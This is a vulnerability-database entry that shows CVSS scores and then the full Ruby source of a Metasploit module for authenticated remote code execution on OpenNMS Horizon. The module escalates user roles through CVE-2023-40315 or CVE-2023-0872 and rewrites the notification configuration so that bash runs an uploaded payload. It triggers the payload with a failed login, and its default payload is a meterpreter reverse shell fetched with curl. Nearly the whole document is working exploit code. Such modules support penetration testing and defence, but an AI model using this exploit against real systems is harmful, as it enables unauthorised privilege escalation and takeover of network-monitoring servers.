8.2 High
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
CHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
LOW
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L
8.3 High
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
This Metasploit module exploits built-in functionality in OpenNMS Horizon in order to execute arbitrary commands as the opennms user. For versions 32.0.2 and higher, this module requires valid credentials for a user with ROLE_FILESYSTEM_EDITOR privileges and either ROLE_ADMIN or ROLE_REST. For versions 32.0.1 and lower, credentials are required for a user with ROLE_FILESYSTEM_EDITOR, ROLE_REST, and/or ROLE_ADMIN privileges. In that case, the module will automatically escalate privileges via CVE-2023-40315 or CVE-2023-0872 if necessary. This module has been successfully tested against OpenNMS version 31.0.7.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'OpenNMS Horizon Authenticated RCE',
'Description' => %q{
This module exploits built-in functionality in OpenNMS
Horizon in order to execute arbitrary commands as the
opennms user. For versions 32.0.2 and higher, this
module requires valid credentials for a user with
ROLE_FILESYSTEM_EDITOR privileges and either
ROLE_ADMIN or ROLE_REST.
For versions 32.0.1 and lower, credentials are
required for a user with ROLE_FILESYSTEM_EDITOR,
ROLE_REST, and/or ROLE_ADMIN privileges. In that case,
the module will automatically escalate privileges via
CVE-2023-40315 or CVE-2023-0872 if necessary.
This module has been successfully tested against OpenNMS
version 31.0.7
},
'License' => MSF_LICENSE,
'Author' => [
'Erik Wynter' # @wyntererik - Discovery and Metasploit
],
'References' => [
['CVE', '2023-40315'], # CVE for privilege escalation via ROLE_FILESYSTEM_EDITOR in OpenNMS Horizon before 32.0.2
['CVE', '2023-0872'], # CVE for privilege escalation via ROLE_REST in OpenNMS Horizon before 32.0.2
],
'Platform' => 'linux',
'Arch' => 'ARCH_CMD',
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter/reverse_tcp',
'RPORT' => 8980,
'SRVPORT' => 8080,
'FETCH_COMMAND' => 'CURL',
'FETCH_FILENAME' => Rex::Text.rand_text_alpha(2..4),
'FETCH_WRITABLE_DIR' => '/tmp',
'FETCH_SRVPORT' => 8081,
'WfsDelay' => 15 # It takes a while for the payload to execute
},
'Targets' => [ [ 'Linux', {} ] ],
'DefaultTarget' => 0,
'Privileged' => true,
'DisclosureDate' => '2023-07-01',
'Notes' => {
'Stability' => [ CRASH_SAFE ],
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options [
OptString.new('TARGETURI', [true, 'The base path to OpenNMS', '/opennms/']),
OptString.new('USERNAME', [true, 'Username to authenticate with', 'admin']),
OptString.new('PASSWORD', [true, 'Password to authenticate with', 'admin'])
]
register_advanced_options [
OptInt.new('PRIVESC_SAVE_DELAY', [true, 'The time in seconds to wait for privesc changes to go into effect.', 3])
]
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def privesc_save_delay
datastore['PRIVESC_SAVE_DELAY']
end
def notification_commands_file
'notificationCommands.xml'
end
def destination_paths_file
'destinationPaths.xml'
end
def notifications_file
'notifications.xml'
end
def users_file
'users.xml'
end
def check
# Try to authenticate
success, msg_or_check_code = opennms_login('check')
return msg_or_check_code unless success
vprint_status(msg_or_check_code)
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.jsp'),
'keep_cookies' => true
})
unless res
return CheckCode::Unknown('Connection failed.')
end
# If we are authenticating as a user without dashboard privileges, the response code will be 403, so we can't use this
# Instead, we should simply check if the HTLM body includes the expected title and version information
unless res.get_html_document.xpath('//title').text.include?('OpenNMS Web Console')
return CheckCode::Detected('Failed to access the OpenNMS Web Console after authentication.')
end
# Based on the version history (https://www.opennms.com/version-history/) all OpenNMS Horizon versions follow the \d+\.\d+\.\d+ pattern
version = res.body.scan(/- Version: (\d+\.\d+\.\d+)$/)&.flatten&.first
if version.blank?
return CheckCode::Detected('Failed to obtain a valid OpenNMS version.')
end
begin
rex_version = Rex::Version.new(version)
rescue ArgumentError => e
return CheckCode::Unknown("Failed to obtain a valid OpenNMS version: #{e}")
end
if rex_version < Rex::Version.new('32.0.2')
print_status("The target is OpenNMS version #{version} and is likely vulnerable to CVE-2023-40315 and CVE-2023-0872.")
else
print_status("The target is OpenNMS version #{version}.")
end
# Check if we can access the user configuration file. There are two ways to do this:
# - Via the /rest/users endpoint. This is possible only for users with ROLE_ADMIN and ROLE_REST privileges.
# - Via /rest/filesystem/contents?f=users.xml. This is possible only for users with ROLE_FILESYSTEM_EDITOR privileges.
# If neither of these work for us, RCE won't be possible.
success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check', filesystem: false) # try the REST endpoint first
unless success
success, xml_doc_or_check_code = grab_and_parse_xml_config_file(users_file, 'users', 'user', 'check') # try the filesystem endpoint next
return xml_doc_or_check_code unless success # in this case xml_doc_or_check_code is a CheckCode so we can return it directly
end
# Extract the privileges of the current user
success, privs_or_check_code = grab_user_privs(xml_doc_or_check_code, 'check')
return privs_or_check_code unless success
# Successful exploitation requires the user to have FILESYSTEM_EDITOR privileges as well as either REST or ADMIN privileges
if privs_or_check_code.include?('ROLE_FILESYSTEM_EDITOR')
if privs_or_check_code.include?('ROLE_REST') || privs_or_check_code.include?('ROLE_ADMIN')
# We don't need to escalate privileges here
@highest_priv = 'GOD'
return CheckCode::Appears("User #{username} has the required privileges for exploitation to work without privilege escalation.")
end
@highest_priv = 'ROLE_FILESYSTEM_EDITOR'
elsif privs_or_check_code.include?('ROLE_ADMIN')
@highest_priv = 'ROLE_ADMIN'
return CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via privilege escalation to ROLE_FILESYSTEM_EDITOR.")
elsif privs_or_check_code.include?('ROLE_REST')
@highest_priv = 'ROLE_REST'
else
return CheckCode::Safe("User #{username} does not have the required privileges for exploitation to work.")
end
# If we are here, we have ROLE_FILESYSTEM_EDITOR privileges or ROLE_REST privileges, but not both and not ROLE_ADMIN
# This means that privilege escalation is required, which can work only if the OpenNMS version is 32.0.1 or lower
if rex_version >= Rex::Version.new('32.0.2')
return CheckCode::Detected("Exploitation requires privilege escalation, which is not possible for OpenNMS version #{version}.")
end
cve = if @highest_priv == 'ROLE_FILESYSTEM_EDITOR'
'CVE-2023-40315'
else
'CVE-2023-0872'
end
CheckCode::Appears("User #{username} has #{@highest_priv} privileges. Exploitation is likely possible via #{cve}.")
end
# This method is use to handle failures based on the stage of the exploit
#
# @param mode [String] The mode to use: check, exploit or cleanup
# @param message [String] The message to display to the user
# @param status [String] The status to use: disconnected, unexpected_reply or no_access
# @return [Array] An array containing a boolean and a CheckCode or message
def deal_with_failure_by_mode(mode, message, status)
return [false, "#{message}. Manual cleanup is required."] if mode == 'cleanup'
case status
when 'disconnected'
return [false, CheckCode::Unknown(message)] if mode == 'check'
fail_with(Failure::Disconnected, message)
when 'unexpected_reply'
return [false, CheckCode::Unknown(message)] if mode == 'check'
fail_with(Failure::UnexpectedReply, message)
when 'no_access'
return [false, CheckCode::Safe(message)] if mode == 'check'
fail_with(Failure::NoAccess, message)
end
end
# This method is used to perform a login attempt
#
# @param mode [String] The mode to use: check, exploit or cleanup
# @param perform_invalid_login [Boolean] Whether to perform a login attempt with random credentials or not
# @return [Array] An array containing a boolean and a CheckCode or message
def opennms_login(mode, perform_invalid_login: false)
if perform_invalid_login
user = Rex::Text.rand_text_alpha(8..12)
pass = Rex::Text.rand_text_alpha(8..12)
keep_cookies = false
else
user = username
pass = password
keep_cookies = true
res1 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login.jsp'),
'keep_cookies' => keep_cookies
})
unless res1
return deal_with_failure_by_mode(mode, 'Connection failed.', 'disconnected')
end
unless res1.code == 200 && res1.get_html_document.xpath('//title').text.include?('OpenNMS Web Console')
msg = if mode == 'check'
'Target is not an OpenNMS application.'
else
'Received unexpected response while attempting to access the OpenNMS Web Console.'
end
return deal_with_failure_by_mode(mode, msg, 'unexpected_reply')
end
end
# Try to authenticate
res2 = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'j_spring_security_check'),
'keep_cookies' => keep_cookies,
'vars_post' => {
'j_username' => user,
'j_password' => pass
}
})
unless res2
if perform_invalid_login
return [false, "Connection failed while attempting to trigger the notification. The payload likely wasn't executed."]
else
return deal_with_failure_by_mode(mode, 'Connection failed while attempting to authenticate.', 'disconnected')
end
end
unless res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp')
if perform_invalid_login
return [true, 'Received expected response while triggering the payload. Please be patient, it may take a few seconds for the payload to execute.']
else
message = if mode == 'check'
'Authentication failed. Please check your credentials.'
else
'Received unexpected response while attempting to authenticate.'
end
return deal_with_failure_by_mode(mode, message, 'unexpected_reply')
end
end
# Authentication was successful
if perform_invalid_login
return [false, "Received unexpected response while attempting to trigger the notification. The payload likely wasn't executed."]
end
[true, 'Successfully authenticated']
end
# This method is used to obtain and parse an XML configuration file from the target via the filesystem endpoint
#
# @param file_name [String] The name of the file to obtain
# @param root_element [String] The name of the root element in the XML file
# @param element [String] The name of the element to obtain from the XML file
# @param mode [String] The mode to use: check, exploit or cleanup. This is used to determine how to proceed upon failure
# @param filesystem [Boolean] Whether to use the filesystem endpoint or not. If not, the file_name will be used as the REST endpoint
# @return [Array] An array containing a boolean and either a CheckCode, a message or a Nokogiri::XML::Document
def grab_and_parse_xml_config_file(file_name, root_element, element, mode, filesystem: true)
request_hash = {
'method' => 'GET',
'keep_cookies' => true
}
if filesystem
request_hash['uri'] = normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents')
request_hash['vars_get'] = { 'f' => file_name }
else
request_hash['uri'] = normalize_uri(target_uri.path, 'rest', file_name)
end
# Try to obtain the file
res = send_request_cgi(request_hash)
unless res
return deal_with_failure_by_mode(mode, "Connection failed while attempting to obtain the current #{file_name} file.", 'disconnected')
end
# when using the filesystem endpoint to obtain the users.xml file, the root element is userinfo, which contains the users element
if file_name == users_file
if filesystem
filesystem_root_element = 'userinfo'
else
filesystem_root_element = 'users'
end
else
filesystem_root_element = root_element
end
unless res.code == 200 && res.body.strip.end_with?("</#{filesystem_root_element}>")
return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to obtain the #{file_name} file. User #{username} my lack the required privileges.", 'unexpected_reply')
end
# Parse the file
begin
doc = Nokogiri::XML(res.body)
elements = doc&.at_css(root_element)&.css(element)&.map { |e| e&.text }
rescue Nokogiri::XML::SyntaxError => e
return deal_with_failure_by_mode(mode, "Failed to parse the #{file_name} file: #{e}", 'unexpected_reply')
end
if elements.blank?
return deal_with_failure_by_mode(mode, "No #{element} elements were found in the #{file_name} file.", 'unexpected_reply')
end
[true, doc]
end
# This method is used to obtain the privileges of a user from the users.xml file
#
# @param xml_doc [Nokogiri::XML::Document] The XML document containing the users
# @param mode [String] The mode to use: check, exploit or cleanup
# @return [Array] An array containing a boolean and a CheckCode, message, or an array of privileges
def grab_user_privs(xml_doc, mode)
privileges = []
begin
user = xml_doc&.at_css('users')&.css('user')&.find { |u| u.at_css('user-id')&.text == username }
if user.blank?
return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. User #{username} was not found.", 'unexpected_reply')
end
privileges = user.css('role')&.map { |r| r&.text }
if privileges.blank?
return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file. No roles were found for user #{username}.", 'unexpected_reply')
end
rescue Nokogiri::XML::SyntaxError => e
return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file: #{e}", 'unexpected_reply')
end
vprint_status("User #{username} has the following privileges: #{privileges.join(' ')}")
[true, privileges]
end
# This method is used to escalate or deescalate privileges
#
# @param deescalate [Boolean] Whether to escalate or deescalate privileges
# @return [Array] An array containing a boolean and a CheckCode or message
def escalate_or_deescalate_privs(deescalate: false)
# Establish some variables based on if we need to escalate or deescalate privileges
if deescalate
use_filesystem = @role_to_add != 'ROLE_FILESYSTEM_EDITOR'
mode = 'cleanup'
else
use_filesystem = @highest_priv == 'ROLE_FILESYSTEM_EDITOR'
mode = 'exploit'
end
# grab and parse the users.xml file
success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem)
return [false, xml_doc_or_msg] unless success
# Get the privileges of the current user as a sanity check
success, privileges_or_msg = grab_user_privs(xml_doc_or_msg, mode)
return [false, privileges_or_msg] unless success
# if we are here to remove privileges, check if we actually have the privileges we want to remove. return otherwise
if deescalate && privileges_or_msg.exclude?(@role_to_add)
return [false, 'Did not find the required privileges to deescalate. Manual cleanup may be required.']
end
# if we need to escalate privileges, check if we already have the privileges we want to escalate to. return otherwise
unless deescalate
if use_filesystem
if privileges_or_msg.include?('ROLE_ADMIN') || privileges_or_msg.include?('ROLE_REST')
# We don't need to escalate privileges here
@highest_priv = 'GOD'
return [true]
end
@role_to_add = 'ROLE_ADMIN'
else
if privileges_or_msg.include?('ROLE_FILESYSTEM_EDITOR')
# We don't need to escalate privileges here
@highest_priv = 'GOD'
return [true]
end
@role_to_add = 'ROLE_FILESYSTEM_EDITOR'
end
end
# Add or remove the required role to the current user
if use_filesystem
# If we have ROLE_FILESYSTEM_EDITOR privileges, we can use the filesystem endpoint to add or remove the required role
begin
user = xml_doc_or_msg.at_css('users').css('user').find { |u| u.at_css('user-id')&.text == username }
if user.blank?
message = "Did not find the current user in the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges."
return deal_with_failure_by_mode(mode, message, 'unexpected_reply')
end
if deescalate
role = user.css('role').find { |r| r.text == @role_to_add }
if role.blank?
return [false, 'Failed to parse the users.xml file while attempting to deescalate privileges. Manual cleanup is required.']
end
role.remove
else
user.add_child(xml_doc_or_msg.create_element('role', @role_to_add))
end
rescue Nokogiri::XML::SyntaxError => e
return deal_with_failure_by_mode(mode, "Failed to parse the users.xml file while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges: #{e}", 'unexpected_reply')
end
# upload the edited users.xml file via the filesystem endpoint
success, message = upload_xml_config_file(users_file, generate_post_data(users_file, xml_doc_or_msg.to_xml(indent: 3)), mode)
unless deescalate
# If we have escalated privileges via the filesystem, we need to wait a few seconds for the changes to be saved
print_status("Waiting #{privesc_save_delay} seconds for the changes to be saved...")
sleep(privesc_save_delay)
end
return [false, message] unless success # this is only used for cleanup. for exploit this cannot happen
else
# If we do not have FILESYSTEM_EDITOR privileges, we can use the REST endpoint to do this
# /users/{username}/roles/{rolename} with PUT to add a role and DELETE to remove a role
res = send_request_cgi({
'method' => deescalate ? 'DELETE' : 'PUT',
'uri' => normalize_uri(target_uri.path, 'rest', 'users', username, 'roles', @role_to_add),
'keep_cookies' => true
}, 2) # for some reason the server does not send a response when this request is performed via Ruby, but it does tend to work. When sending the same request via Burp suite, the server did respond.
# 204 = no content, 304 = not modified. 204 indicates success, 304 indicates that the role was already added/removed
if res && ![204, 304].include?(res.code)
return deal_with_failure_by_mode(mode, "Received unexpected reply while attempting to #{deescalate ? 'deescalate' : 'escalate'} privileges", 'unexpected_reply')
end
end
# Get the users.xml file again to make sure our changes were saved
success, xml_doc_or_msg = grab_and_parse_xml_config_file(users_file, 'users', 'user', mode, filesystem: use_filesystem)
return [false, xml_doc_or_msg] unless success # this is only used for cleanup. for exploit this cannot happen
# Get the privileges of the current user again to make sure our changes were saved
success, privs_or_msg = grab_user_privs(xml_doc_or_msg, mode)
return [false, privs_or_msg] unless success
# Check if our changes were saved
if deescalate
if privs_or_msg.include?(@role_to_add)
return [false, 'Failed to deescalate privileges. Manual cleanup is required.']
end
return [true, "Successfully deescalated privileges by removing #{@role_to_add}"]
end
# If we are here, we are escalating privileges
unless privs_or_msg.include?(@role_to_add)
fail_with(Failure::UnexpectedReply, 'Failed to escalate privileges')
end
@highest_priv = 'GOD'
[true, "Successfully escalated privileges by adding #{@role_to_add}"]
end
# This method is used to generate the XML document that will be used to add a notification command
#
# @param file_name [String] The name of the file to upload
# @param xml_doc [Nokogiri::XML::Document] The XML document to upload
# @return [Rex::MIME::Message] The post data
def generate_post_data(file_name, data_to_write)
post_data = Rex::MIME::Message.new
post_data.add_part(data_to_write, 'text/xml', nil, "form-data; name=\"upload\"; filename=\"#{file_name}\"")
post_data
end
# This method is used to upload an XML configuration file to the target
#
# @param file_name [String] The name of the file to upload
# @param post_data [Rex::MIME::Message] The post data to upload
# @param mode [String] The mode to use: exploit or cleanup
# @return [Array] An array containing a boolean and an optional message
def upload_xml_config_file(file_name, post_data, mode = 'exploit')
# upload the edited notificationCommands.xml file
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),
'vars_get' => { 'f' => file_name },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'keep_cookies' => true,
'data' => post_data.to_s
})
unless res
return deal_with_failure_by_mode(mode, "Connection failed while attempting to upload the #{file_name} file", 'disconnected')
end
unless res.code == 200 && res.body.include?('Successfully wrote to')
return deal_with_failure_by_mode(mode, "Unexpected response received while attempting to upload the #{file_name} file", 'unexpected_reply')
end
[true]
end
def find_element_via_at_css(file_name)
if [destination_paths_file, notifications_file].include?(file_name)
return false
end
true
end
# This method is used to edit an XML configuration file
#
# @param file_name [String] The name of the file to edit
# @param root_element [String] The name of the root element in the XML file
# @param element [String] The name of the element to edit in the XML file
def edit_xml_config_file(file_name, root_element, element)
# First we need to get the current #{file_name} file, so we can edit our #{element_name} in it
_success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit')
# update the xml document with a new element
new_value = Rex::Text.rand_text_alpha(8..12)
case file_name
when notification_commands_file
xml_doc = add_notification_command(xml_doc, new_value)
when destination_paths_file
xml_doc = add_destination_path(xml_doc, new_value)
when notifications_file
xml_doc = add_notification(xml_doc, new_value)
end
# upload the edited #{file_name} file via the filesystem endpoint
upload_xml_config_file(file_name, generate_post_data(file_name, xml_doc.to_xml(indent: 3)), 'exploit')
# generate global variables for cleanup
case file_name
when notification_commands_file
@notification_command_name = new_value
when destination_paths_file
@destination_path_name = new_value
when notifications_file
@notification_name = new_value
end
# Get the #{file_name} file again to make sure our #{element_name} was edited
_success, xml_doc = grab_and_parse_xml_config_file(file_name, root_element, element, 'exploit')
# Check if our #{element_name} was edited
if find_element_via_at_css(file_name)
full_element = xml_doc.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == new_value }
else
full_element = xml_doc.at_css(root_element).css(element).find { |e| e['name'] == new_value }
end
if full_element.blank?
fail_with(Failure::UnexpectedReply, "Failed to verify that the #{file_name} file was successfully edited")
end
print_status("Successfully edited #{file_name}")
end
# This method is used to add a notification command to a Nokogiri XML document
#
# @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification command to
# @param notification_command_name [String] The name of the notification command to add
# @return [Nokogiri::XML::Document] The updated XML document
def add_notification_command(xml_doc, notification_command_name)
# A notification command is a command that gets executed when a notification is triggered. We can use this to execute our payload.
# Update the xml document with a new notification command
notification_comment = Rex::Text.rand_text_alpha(6..10)
notification_command = xml_doc.create_element('command', 'binary' => 'true') # Change binary attribute value if needed
name = xml_doc.create_element('name', notification_command_name)
execute = xml_doc.create_element('execute', '/usr/bin/bash')
comment = xml_doc.create_element('comment', notification_comment)
argument = xml_doc.create_element('argument', 'streamed' => 'false')
argument_switch = xml_doc.create_element('substitution', "/usr/share/opennms/etc/#{@payload_file_name}")
argument.add_child(argument_switch)
notification_command.add_child(name)
notification_command.add_child(execute)
notification_command.add_child(comment)
notification_command.add_child(argument)
xml_doc.at_css('notification-commands').add_child(notification_command)
xml_doc
end
# This method is used to add a destination path to a Nokogiri XML document
#
# @param xml_doc [Nokogiri::XML::Document] The XML document to add the destination path to
# @param destination_path_name [String] The name of the destination path to add
# @return [Nokogiri::XML::Document] The updated XML document
def add_destination_path(xml_doc, destination_path_name)
# A destination path points to a specific group or user that will receive a notification when a notification is triggered.
# It also indicates which notification command should be executed when the notification is triggered.
# We need to add a destination path that points to our notification command so that it gets executed when a notification is triggered.
# Update the xml document with a new destination path
destination_path = xml_doc.create_element('path', 'name' => destination_path_name)
target = xml_doc.create_element('target')
name = xml_doc.create_element('name', 'Admin')
command = xml_doc.create_element('command', @notification_command_name)
target.add_child(name)
target.add_child(command)
destination_path.add_child(target)
xml_doc.at_css('destinationPaths').add_child(destination_path)
xml_doc
end
# This method is used to add a notification to a Nokogiri XML document
#
# @param xml_doc [Nokogiri::XML::Document] The XML document to add the notification to
# @param notification_name [String] The name of the notification to add
# @return [Nokogiri::XML::Document] The updated XML document
def add_notification(xml_doc, notification_name)
# A notification is triggered when a specific event occurs, and can be configured to call a specific destination path.
# We need to add a notification that will trigger our destination path so that our notification command gets executed.
# Update the xml document with a new notification that will be triggered when a user fails to authenticate
# since that is something we can easily trigger ourselves
notification_message = Rex::Text.rand_text_alpha(6..10)
notification = xml_doc.create_element('notification', 'name' => notification_name, 'status' => 'on')
uei = xml_doc.create_element('uei', 'uei.opennms.org/internal/authentication/failure')
# We need to add a rule for the IP. Let's use a negative comparison with a non-routable IP, which will always work (see RFC 5737)
rule = xml_doc.create_element('rule', "IPADDR != '192.0.2.#{rand(0..255)}'")
destination_path = xml_doc.create_element('destinationPath', @destination_path_name)
text_message = xml_doc.create_element('text-message', notification_message)
notification.add_child(uei)
notification.add_child(rule)
notification.add_child(destination_path)
notification.add_child(text_message)
xml_doc.at_css('notifications').add_child(notification)
xml_doc
end
# This method is used to remove an element from an XML configuration file
#
# @param file_name [String] The name of the file to remove the element from
# @param root_element [String] The name of the root element in the XML file
# @param element [String] The name of the element to remove from the XML file
# @param element_to_remove [String] The name of the element to remove from the XML file
def revert_xml_config_file(file_name, root_element, element, element_to_remove)
# First we need to get the current #{file_name} file, so we can remove our #{element_name} from it
success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup')
unless success
print_error(xml_doc_or_msg)
return
end
begin
if find_element_via_at_css(file_name)
full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e.at_css('name')&.text == element_to_remove }
else
full_element = xml_doc_or_msg.at_css(root_element).css(element).find { |e| e['name'] == element_to_remove }
end
unless full_element.present?
print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required")
return
end
full_element.remove
rescue Nokogiri::XML::SyntaxError
print_error("Failed to parse the #{file_name} file while attempting to remove #{element_to_remove}. Manual cleanup is required.")
return
end
# generate post data
post_data = generate_post_data(file_name, xml_doc_or_msg.to_xml(indent: 3))
success, message = upload_xml_config_file(file_name, post_data, 'cleanup')
unless success
print_error(message)
return
end
# Get the #{file_name} file again to make sure our #{element_name} was removed
success, xml_doc_or_msg = grab_and_parse_xml_config_file(file_name, root_element, element, 'cleanup')
unless success
print_error(xml_doc_or_msg)
return
end
# Check if our #{element_name} was removed
if xml_doc_or_msg.at_css(root_element).css(element).map { |e| e.at_css('name')&.text }.include?(element_to_remove)
print_error("Failed to remove #{element_to_remove} from #{file_name}. Manual cleanup is required.")
else
vprint_status("Successfully removed #{element_to_remove} from #{file_name}")
end
end
# This method is used to trigger a reload of the OpenNMS configuration
#
# @param mode [String] The mode to use: exploit or cleanup
# @return [Array] An array containing a boolean and a message
def update_configuration(mode)
# We need to update the configuration in order for our changes to take effect
xml_doc = Nokogiri::XML::Builder.new do |xml|
xml.event('xmlns' => 'http://xmlns.opennms.org/xsd/event') do
xml.uei('uei.opennms.org/internal/reloadDaemonConfig')
xml.source('perl_send_event')
xml.time(Time.now.strftime('%Y-%m-%dT%H:%M:%S%:z'))
xml.host(Rex::Text.rand_text_alpha(8..12))
xml.parms do
xml.parm do
xml.parmName('daemonName')
xml.value('Notifd', { 'type' => 'string', 'encoding' => 'text' })
end
end
end
end
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'events'),
'ctype' => 'application/xml',
'keep_cookies' => true,
'data' => xml_doc.to_xml(indent: 3)
})
unless res
message = 'Connection failed while attempting to update the configuration.'
message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup'
return deal_with_failure_by_mode(mode, message, 'disconnected')
end
unless res.code == 202
message = 'Received unexpected response while attempting to update the configuration.'
message += ' The cleanup changes have not been applied, but will be at the next config reload.' if mode == 'cleanup'
return deal_with_failure_by_mode(mode, message, 'unexpected_reply')
end
[true, 'Successfully updated the configuration']
end
# This method is used to write the payload to a .bsh file and trigger the notification
#
# @param cmd [String] The command to execute
def write_payload_to_bsh_file(cmd)
# We need to write our payload to a .bsh file so that it can be executed by the notification command
post_data = generate_post_data(@payload_file_name, cmd)
res1 = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),
'vars_get' => { 'f' => @payload_file_name },
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'keep_cookies' => true,
'data' => post_data.to_s
})
unless res1
fail_with(Failure::Disconnected, 'Connection failed while attempting to upload the payload file')
end
unless res1.code == 200 && res1.body.include?('Successfully wrote to')
fail_with(Failure::UnexpectedReply, 'Failed to upload the payload file')
end
# Get the payload file again to make sure it was uploaded successfully
res2 = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),
'vars_get' => { 'f' => @payload_file_name },
'keep_cookies' => true
})
unless res2
fail_with(Failure::Disconnected, 'Connection failed while attempting to obtain the current payload file')
end
unless res2.code == 200 && res2.body == cmd
fail_with(Failure::UnexpectedReply, 'Failed to verify that the payload file was successfully uploaded')
end
print_good("Successfully uploaded the payload to #{@payload_file_name}")
@payload_written = true
end
def execute_command(cmd, _opts = {})
# Write the payload to a .bsh file
write_payload_to_bsh_file(cmd)
print_status('Triggering the notification to execute the payload')
# Trigger the notification by performing a login attempt using random credentials
success, message = opennms_login('exploit', perform_invalid_login: true)
if success
print_status(message)
else
print_error(message)
end
end
# Horizon installs with notifications globally disabled by default. This exploit depends on notification being enabled
# in order to obtain RCE. If notifications are disabled a user with administrative privileges is able to turn them on.
# https://docs.opennms.com/horizon/30/operation/notifications/getting-started.html
def ensure_notifications_enabled
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.jsp'),
'keep_cookies' => true
})
fail_with(Failure::UnexpectedReply, 'Failed to determine if notifications were enabled') unless res
if res.get_html_document.xpath('//i[contains(@title, \'Notices: On\')]').empty?
vprint_status('Notifications are not enabled, meaning the target is not exploitable as is. Enabling notifications now...')
res2 = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'admin', 'updateNotificationStatus'),
'keep_cookies' => true,
'vars_post' => {
'status' => 'on'
}
})
fail_with(Failure::UnexpectedReply, 'Failed to enable notifications') unless res2 && res2.redirect? && res2.redirection.to_s.end_with?('/index.jsp')
end
vprint_good('Notifications are enabled')
end
def exploit
# Check if we need to escalate privileges
if @highest_priv && @highest_priv != 'GOD'
# This is not performed if the user has set FORCEEXPLOIT to true. In that case we'll just start the exploit chain and hope for the best.
_success, msg = escalate_or_deescalate_privs
print_good(msg) if msg.present? # _success will always be true here, otherwise we would have failed already
end
# Let's make sure we have a valid session by clearing the cookie jar and logging in again
# This will also ensure that any new privileges we may have added are applied
cookie_jar.clear
_success, message = opennms_login('exploit')
vprint_status(message) # _success will always be true here, otherwise we would have failed already
# Check to ensure Notifications are turned on. If they are disabled, enable them.
ensure_notifications_enabled
# Generate a random payload file name
@payload_file_name = "#{Rex::Text.rand_text_alpha(8..12)}.bsh".downcase
# Add a notification command
edit_xml_config_file(notification_commands_file, 'notification-commands', 'command')
# Add a destination path
edit_xml_config_file(destination_paths_file, 'destinationPaths', 'path')
# Add a notification
edit_xml_config_file(notifications_file, 'notifications', 'notification')
# Update the configuration changes we made
update_configuration('exploit')
# Write the payload and trigger the notification
execute_command(payload.encoded)
end
def cleanup
return if [@payload_file_name, @notification_name, @destination_path_name, @notification_command_name, @role_to_add].all?(&:blank?)
print_status('Attempting cleanup...')
# to be on the safe side, we'll clear the cookie jar and log in again
cookie_jar.clear
success, message = opennms_login('cleanup')
if success
vprint_status(message)
else
print_error(message)
return
end
# Delete the payload file
if @payload_file_name.present? && @payload_written
res = send_request_cgi({
'method' => 'DELETE',
'uri' => normalize_uri(target_uri.path, 'rest', 'filesystem', 'contents'),
'vars_get' => { 'f' => @payload_file_name },
'keep_cookies' => true
})
unless res
print_error("Connection failed while attempting to delete the payload file #{@payload_file_name}. Manual cleanup is required.")
return
end
unless res.code == 200 && res.body.include?('Successfully deleted')
print_error("Failed to delete the payload file #{@payload_file_name}. Manual cleanup is required.")
return
end
vprint_good("Successfully deleted the payload file #{@payload_file_name}")
end
# Delete the notification
revert_xml_config_file(notifications_file, 'notifications', 'notification', @notification_name) if @notification_name.present?
# Delete the destination path
revert_xml_config_file(destination_paths_file, 'destinationPaths', 'path', @destination_path_name) if @destination_path_name.present?
# Delete the notification command
revert_xml_config_file(notification_commands_file, 'notification-commands', 'command', @notification_command_name) if @notification_command_name.present?
# Update the configuration changes we made
success, message = update_configuration('cleanup')
if success
vprint_status(message)
else
print_error(message)
end
# Revert the privilege escalation if necessary
if @role_to_add.present?
success, message = escalate_or_deescalate_privs(deescalate: true)
if success
vprint_status(message)
else
print_error(message)
end
end
end
end
8.2 High
CVSS3
Attack Vector
ADJACENT
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
